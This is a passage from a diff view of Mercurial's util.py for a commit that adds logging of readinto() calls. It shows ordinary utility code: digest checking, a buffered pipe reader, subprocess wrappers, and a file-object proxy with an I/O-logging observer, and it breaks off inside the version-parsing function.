##// END OF EJS Templates
util: log readinto() I/O...
Gregory Szorc -
r36648:29128309 default
parent child Browse files
Show More
@@ -1,4045 +1,4054 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
def isatty(fp):
    """Report whether ``fp`` is attached to a terminal.

    Objects that do not implement ``isatty()`` at all are treated as
    non-terminals rather than raising.
    """
    try:
        result = fp.isatty()
    except AttributeError:
        result = False
    return result
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
# Not every osutil implementation provides these optional functions;
# expose them as module-level aliases only when present.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass

# Python compatibility

# Unique sentinel used by safehasattr() to distinguish "attribute missing"
# from any real attribute value (including None).
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
os.stat_float_times(False)
183
183
def safehasattr(thing, attr):
    """Sentinel-based hasattr() replacement.

    Uses getattr() with the module-level ``_notset`` marker as the default:
    the attribute is considered present whenever the lookup does not fall
    back to the sentinel.
    """
    found = getattr(thing, attr, _notset)
    return found is not _notset
186
186
187 def _rapply(f, xs):
187 def _rapply(f, xs):
188 if xs is None:
188 if xs is None:
189 # assume None means non-value of optional data
189 # assume None means non-value of optional data
190 return xs
190 return xs
191 if isinstance(xs, (list, set, tuple)):
191 if isinstance(xs, (list, set, tuple)):
192 return type(xs)(_rapply(f, x) for x in xs)
192 return type(xs)(_rapply(f, x) for x in xs)
193 if isinstance(xs, dict):
193 if isinstance(xs, dict):
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return f(xs)
195 return f(xs)
196
196
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
    """
    if f is not pycompat.identity:
        return _rapply(f, xs)
    # Identity mapping: return the input untouched instead of rebuilding
    # the whole structure (fast path mainly for py2).
    return xs
219
219
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt via rawinput() using ``fin``/``fout`` as stdin/stdout.

    The standard streams are temporarily replaced with str-wrapped
    versions of the given handles and restored afterwards; the response
    is returned as local-encoded bytes.
    """
    origin, origout = sys.stdin, sys.stdout
    try:
        sys.stdin = encoding.strio(fin)
        sys.stdout = encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        # Always restore the real streams, even if the prompt raised.
        sys.stdin, sys.stdout = origin, origout
227
227
def bitsfrom(container):
    """OR together every element of ``container`` into a single bitmask."""
    mask = 0
    for flag in container:
        mask |= flag
    return mask
233
233
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    # Enable DeprecationWarning for Mercurial itself and extensions.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
252
252
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    # stacklevel + 1 so the warning points at our caller, not this helper.
    warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
262
262
# Supported digest algorithms, keyed by their wire/protocol name.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# Sanity check: every entry in the strength ranking must be implemented.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
273
273
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` into every tracked hash object."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest accumulated so far for ``key``.

        Raises Abort when ``key`` is not a known digest type.
        """
        if key not in DIGESTS:
            # Fix: the error message previously interpolated the unrelated
            # module-level loop variable 'k', reporting the wrong digest name.
            raise Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
320
320
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, hashing and counting what passes."""
        data = self._fh.read(length)
        self._got += len(data)
        self._digester.update(data)
        return data

    def validate(self):
        """Abort unless the observed size and all digests match."""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
352
352
# Python 3 has no builtin buffer() type; fall back to a memoryview-based
# replacement with the same (sliceable, offset, length) signature.
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        # Zero-copy slice: memoryview shares the underlying storage.
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
360
360
# Value passed as subprocess close_fds: inherited descriptors are only
# closed in children on POSIX platforms (see popen2/popen4 below).
closefds = pycompat.isposix

# Number of bytes bufferedinputpipe._fillbuffer() requests per os.read().
_chunksize = 4096
364
364
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        # Buffered data as a list of chunks, oldest first; collapsed into a
        # single string only when needed (_frombuffer/readline).
        self._buffer = []
        # Set once os.read() returns an empty result (end of pipe).
        self._eof = False
        # Total number of bytes currently held across self._buffer.
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # Delegated straight to the wrapped pipe.
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` bytes, short only when EOF is reached."""
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        """Return the next line (including its newline, if any)."""
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline in the most recent chunk, -1 if none.
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # Collapse all chunks so plain slicing below works on one string.
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # Unbuffered os.read() keeps this cooperating with select()/polling.
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
467
467
def mmapread(fp):
    """Return a read-only mmap covering the whole of ``fp``.

    ``fp`` may be a file object (its fileno() is used) or a raw file
    descriptor.  Empty files cannot be mmapped; for those an empty
    buffer is returned instead of raising.
    """
    # Resolve the descriptor *outside* the try block.  Previously it was
    # computed inside, so a ValueError raised by fileno() (e.g. a closed
    # file) fell into the handler and hit an unbound 'fd'.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
478
478
def popen2(cmd, env=None, newlines=False):
    """Run ``cmd`` through the shell and return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
489
489
def popen3(cmd, env=None, newlines=False):
    """Run ``cmd`` through the shell and return (stdin, stdout, stderr).

    Identical to popen4() except the Popen object itself is dropped.
    """
    return popen4(cmd, env, newlines)[:3]
493
493
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run ``cmd`` through the shell.

    Returns (stdin, stdout, stderr, proc) where proc is the Popen object.
    """
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
502
502
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    # Slots are assigned via object.__setattr__ because our own __setattr__
    # forwards every assignment to the wrapped file object.
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # Bypass our own __setattr__ (which writes through to ``_orig``) so
        # the proxy's two slots land on the proxy itself.
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        # Names resolved on the proxy itself; everything else is delegated
        # to the wrapped file object.
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        # Attribute deletion is forwarded to the wrapped object.
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        # Attribute assignment is forwarded to the wrapped object.
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        # Iteration is delegated directly and is NOT observed.
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped object, then notify the observer.

        The observer method (if it exists) receives the call's result
        followed by the original arguments.
        """
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` performs low-level ``os.read()`` calls that would
    otherwise bypass ``fileobjectproxy``. This subclass re-publishes those
    events (and the higher-level buffered operations) to the observer
    attached to the proxied input file object.
    """
    def _fillbuffer(self):
        result = super(observedbufferedinputpipe, self)._fillbuffer()

        callback = getattr(self._input._observer, r'osread', None)
        if callback:
            callback(result, _chunksize)

        return result

    # The buffered operations below happen on this object rather than on
    # the underlying file, so they are reported through dedicated observer
    # methods instead of the plain read()/readline() hooks.
    def read(self, size):
        result = super(observedbufferedinputpipe, self).read(size)

        callback = getattr(self._input._observer, r'bufferedread', None)
        if callback:
            callback(result, size)

        return result

    def readline(self, *args, **kwargs):
        result = super(observedbufferedinputpipe, self).readline(*args,
                                                                 **kwargs)

        callback = getattr(self._input._observer, r'bufferedreadline', None)
        if callback:
            callback(result)

        return result
# Table mapping each byte to its escaped form: ``\xNN`` by default, with
# readable overrides for backslash, carriage return, and newline.
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that require escaping: C0 control characters (note \x09/TAB is
# deliberately excluded), backslash, DEL, and all high-bit bytes.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
def escapedata(s):
    """Return ``s`` with special and unprintable bytes escaped for logging."""
    # The escape table is keyed on bytes objects; normalize bytearray input.
    if isinstance(s, bytearray):
        s = bytes(s)

    def _replace(m):
        return DATA_ESCAPE_MAP[m.group(0)]

    return DATA_ESCAPE_RE.sub(_replace, s)
class fileobjectobserver(object):
    """Logs file object activity.

    Events are written to ``fh``, each line prefixed with ``name``.
    ``reads``/``writes`` toggle which directions are logged; ``logdata``
    additionally logs the (escaped) payload of each operation.
    """
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.reads = reads
        self.writes = writes

    def _writedata(self, data):
        """Append the payload of an operation, if data logging is enabled."""
        if not self.logdata:
            self.fh.write('\n')
            return

        if b'\n' in data:
            # Data with newlines is written to multiple lines.
            self.fh.write(':\n')
            for line in data.splitlines(True):
                self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
        else:
            # Simple case writes all data on a single line.
            self.fh.write(': %s\n' % escapedata(data))

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                  res))
        # ``res`` is the number of bytes stored into ``dest`` (or None).
        if res is None:
            data = b''
        else:
            data = dest[0:res]
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object.

    Activity on ``fh`` is written to ``logh``, with each line prefixed by
    ``name``. ``reads``/``writes``/``logdata`` are forwarded to the
    underlying ``fileobjectobserver``.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(logh, name, reads=reads, writes=writes,
                           logdata=logdata))
def version():
    """Return version information if available.

    Falls back to ``'unknown'`` when the generated ``__version__`` module
    is absent (e.g. running from a source checkout without a build step).
    """
    try:
        from . import __version__
    except ImportError:
        return 'unknown'
    return __version__.version
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split the numeric part from the first '+' or '-' qualifier. Use a raw
    # string: '\+' in a non-raw literal is an invalid escape sequence and
    # warns (eventually errors) on modern Pythons.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
